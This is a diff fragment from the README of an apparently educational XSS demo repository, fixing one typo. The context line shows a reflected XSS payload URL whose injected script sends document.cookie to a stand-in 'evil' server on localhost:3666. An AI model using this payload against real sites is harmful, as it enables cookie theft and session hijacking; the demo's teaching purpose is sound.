epomatti/xss-attack/README.md

 http://localhost:3000?txid=TX999<script>new Image().src=`http://localhost:3666/evil?cookie=${document.cookie}`</script>
 ```

-The cookie information will be sent to the malicious destionation.
+The cookie information will be sent to the malicious destination.